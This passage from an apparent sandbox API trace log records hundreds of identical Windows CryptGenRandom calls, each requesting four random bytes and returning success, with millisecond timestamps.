dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.390] CryptGenRandom (in: 